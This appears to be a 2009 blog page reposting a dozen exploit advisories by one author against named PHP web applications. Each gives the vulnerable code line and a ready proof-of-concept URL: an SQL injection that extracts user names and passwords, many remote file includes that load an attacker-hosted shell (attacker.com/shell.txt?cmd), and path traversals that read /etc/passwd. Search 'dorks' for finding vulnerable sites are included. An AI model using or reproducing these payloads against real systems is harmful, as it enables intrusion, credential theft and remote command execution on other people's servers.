Sabtu, 05 Desember 2009

427BB Fourtwosevenbb <= 2.3.2 SQL Injection Exploit

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#Download Script : http://sourceforge.net/projects/fourtwosevenbb/files/
########################################################################

########################################################################
#3rr0r: ./fourtwosevenbb-2.3.2/showpost.php
#
#
########################################################################

########################################################################
#PoC : http://server/[path]/showpost.php?ForumID=1&post=[SQL]
# http://server/[path]/showpost.php?ForumID=1&post=1%20union%20select%201,UserName,3,4,5,Password,7%20FROM%20427bb_personal%20WHERE%20ID=1--
########################################################################

[ Gorontalo / 2009 ]

SAPID SHOP <= 1.3 Remote File Include Vulnerability

[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#SAPID SHOP <= 1.3 Remote File Include Vulnerability
#Download Script : http://sourceforge.net/projects/sapid/files
#Dork : die("lamers attempt"); :D
########################################################################
#
#Vuln : ./SAPID-SHOP-1.3/usr/extensions/get_tree.inc.php (line 11)
#
# # if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
# include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }
# ?>
#
#PoC : http://0wn3d.com/[path]/usr/extensions/get_tree.inc.php?root_path=http://attacker.com/shell.txt???
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################

[ Gorontalo / 2009 ]

Thatware <= 0.5.3 Multiple Remote File Include Exploit

[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#Thatware <= 0.5.3 Multiple Remote File Include Exploit
#Download Script : http://sourceforge.net/projects/thatware/files
########################################################################
#
#Vuln : ./thatware_path/config.php (line 4)
#
# # include $root_path."db_settings.php";
# ?>
#
#PoC : http://server/config.php?root_path=http://[attcker]/shell.txt???
#
#Vuln : ./thatware_path/artlist.php (line 28)
#
# # include $root_path.'thatfile.php';
# ?>
#
#PoC : http://server/artlist.php?root_path=http://[attcker]/shell.txt???
#
#Vuln : ./thatware_path/thatfile.php (line 130)
#
# # if(file_exists($root_path.'config.php'))
# include($root_path.'config.php');
# ?>
#
#PoC : http://server/thatfile.php?root_path=http://[attcker]/shell.txt???
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################


[ Gorontalo / 2009 ]

Public Media Manager <= 1.3 (forms_dir) Remote File Include Vulnerability

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#Public Media Manager <= 1.3 (forms_dir) Remote File Include Vulnerability
#Download Script : http://sourceforge.net/projects/pmm-cms/files/
#Dork : die("Lamers attempt"); :D
########################################################################
#
#Vuln : ./pmm-cms-1.3/comcal/calmenu.php (line 4)
# # require $forms_dir."calmenuform.php";
# ?>
#PoC : http://server/[path]/comcal/calmenu.php?forms_dir=http://attacker.com/shell.txt?cmd
#
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################

[ Gorontalo / 2009 ]


Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerability

[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerability
#Download Script : http://quate.net/quatecms
#Dork : die("lamers attempt"); :P
########################################################################
#
#Vuln RFI : ./QuateCMS_035/admin/includes/header.php (line 27)
# # if ($bypass_restrict != 1) {
# require_once($secure_page_path. "includes/secure.php");
# }
# ?>
#PoC : http://[target]/[path]/admin/includes/header.php?secure_page_path=http://[attacker]/shell.txt???
#
#
#########################################################################
#
#Vuln LFI : ./QuateCMS_035/admin/includes/footer.php (line 4)
# # if ($not_logged_in != 1) {
# if (file_exists("includes/themes/" .$row_secure['account_theme']. "/footer.php")) {
# require_once("themes/" .$row_secure['account_theme']. "/footer.php");
# ?>
#PoC : http://[target]/[path]/admin/includes/footer.php?row_secure[account_theme]=../../../../../../etc/passwd
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################

[ Gorontalo / 2009 ]

ISPworker <= 1.23 Remote File Disclosure exploit

[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#ISPworker <= 1.23 Remote File Disclosure exploit
#Download Script : http://www.ispware.de/_files/ispworker-1.23.tar.gz
#Dork : die("lamers attempt"); :P
########################################################################
#
#Vuln : ./ispworker-1.23/files/ispworker/module/ticket/download.php
#
# # header('Content-Disposition: attachment; filename="'.$_REQUEST[filename].'"');
# readfile("./tmp/$ticketid"."_".$_REQUEST[filename]);
# ?>
#
#PoC : http://[target]/[path]/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd
# http://[target]/[path]/module/ticket/download.php?filename=../../../../../../../../../etc/passwd
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################

[ Gorontalo / 2009 ]

Ciamos CMS <= 0.9.5 (module_path) Remote File Include Vulnerability

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#Ciamos CMS <= 0.9.5 (module_path) Remote File Include Vulnerability
#Download Script : http://sourceforge.net/projects/ciamosmodules/files/
#Dork : die("Hacking attempt"); :D
########################################################################
#
#Vuln : ./ciamos/modules/pms/index.php (line 13)
# # include_once($module_path.'include/header.php');
# ?>
#PoC : http://server/modules/pms/index.php?module_path=http://[attacker]/shell.txt???
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################



[ Gorontalo / 2009 ]

SweetRice <= 0.5.0 Remote File Include Vulnerability

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#SweetRice <= 0.5.0 Remote File Include Vulnerability
#Download Script : http://php.opensourcecms.com/scripts/redirect/download.php?id=353
#Dork : die("lamers attempt"); :P
########################################################################
#
#Vuln : ./sweetrice/_plugin/subscriber/inc/post.php (line 2)
# # include_once($root_dir."_plugin/fckeditor/fckeditor.php") ;
# ?>
#PoC : http://server/_plugin/subscriber/inc/post.php?root_dir=http://[attacker]/shell.txt???
#
#
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################




[ Gorontalo / 2009

phptraverse <= 0.8.0 Remote File Include Vulnerability

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#phptraverse <= 0.8.0 Remote File Include Vulnerability
#Download Script : http://sourceforge.net/projects/phptraverse/files/
#Dork : die("Hacking attempt"); :D
########################################################################
#
#Vuln : ./phptraverse-0.8.0/assets/plugins/mp3_id/mp3_id.php (line 32)
# # include_once $GLOBALS['BASE'].'/PEAR/PEAR.php';
# ?>
#PoC : http://server/[path]/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=http://attacker.com/shell.txt?cmd
#
#
#
########################################################################
#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,
# dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*
########################################################################

/##############################################\
# all member at sekuritionline.net #
# all member at manadocoding.net #
\##############################################/

[ Gorontalo / 2009 ]

OPT (Outreach Project Tool) <= 1.2.6 [CRM_path] Remote File Include Vulnerability

   [ Discovered by cr4wl3r \ Indonesian Hacker ]

########################################################################
# OPT (Outreach Project Tool) <= 1.2.6 [CRM_path] Remote File Include Vulnerability
# Download Script : http://sourceforge.net/projects/outreach
# Dork : "Adhan Handsome" :D
########################################################################
#
# Vuln : ./OPT_1-2-7_MAX/opt/forums/Forum_Include/index.php (line 10)
# # include "$CRM_path/forums/Forum_Include/forum_admin.inc";
# ?>
# PoC : http://server/[path]/forums/Forum_Include/index.php?CRM_path=http://[attacker]/shell.txt???
#
#
#
########################################################################
# Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,
# dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*
########################################################################

/##############################################\
# all member at sekuritionline.net #
# all member at manadocoding.net #
\##############################################/

# Contact Me : cr4wl3r[4t]linuxmail[dot]org

[ Gorontalo / 2009 ]




NukeHall <= 0.3 Multiple Remote File Include Vulnerability

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#NukeHall <= 0.3 Multiple Remote File Include Vulnerability
#Download Script : http://sourceforge.net/project/NukeHall/files/
#Dork : die("Hacking attempt"); :D
########################################################################
#
#Vuln : ./nukehall_0.3/admin/modules/blocks.php (line 28)
# # include $spaw_root.'spaw_control.class.php';
# ?>
#PoC : http://server/[path]/admin/modules/blocks.php?spaw_root=http://attacker.com/shell.txt?cmd
#
#
#Vuln : ./nukehall_0.3/admin/modules/messages.php (line 28)
# # include $spaw_root.'spaw_control.class.php';
# ?>
#PoC : http://server/[path]/admin/modules/messages.php?spaw_root=http://attacker.com/shell.txt?cmd
#
#
#Vuln : ./nukehall_0.3/admin/modules/stories.php (line 28)
# # include $spaw_root.'spaw_control.class.php';
# ?>
#PoC : http://server/[path]/admin/modules/stories.php?spaw_root=http://attacker.com/shell.txt?cmd
#
#
#
#
########################################################################
#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,
# dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*
########################################################################

/##############################################\
# all member at manadocoding.net #
# all member at sekuritionline.net #
\##############################################/

[ Gorontalo / 2009 ]


KR-Web <= 1.1b2 Remote File Include Vulnerability

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#KR-Web <= 1.1b2 Remote File Include Vulnerability
#Download Script : http://sourceforge.net/projects/krw/files/
#Dork : die("Hacking attempt"); :D
########################################################################
#
#Vuln : ./KR-Web-1.1b2/adm/krgourl.php (line 2)
# # include "$DOCUMENT_ROOT/paths.inc";
# ?>
#PoC : http://server/[path]/adm/krgourl.php?DOCUMENT_ROOT=http://attacker.com/shell.txt?cmd
#
#
#
########################################################################
#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,
# dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*
########################################################################

/##############################################\
# all member at sekuritionline.net #
# all member at manadocoding.net #
\##############################################/

[ Gorontalo / 2009 ]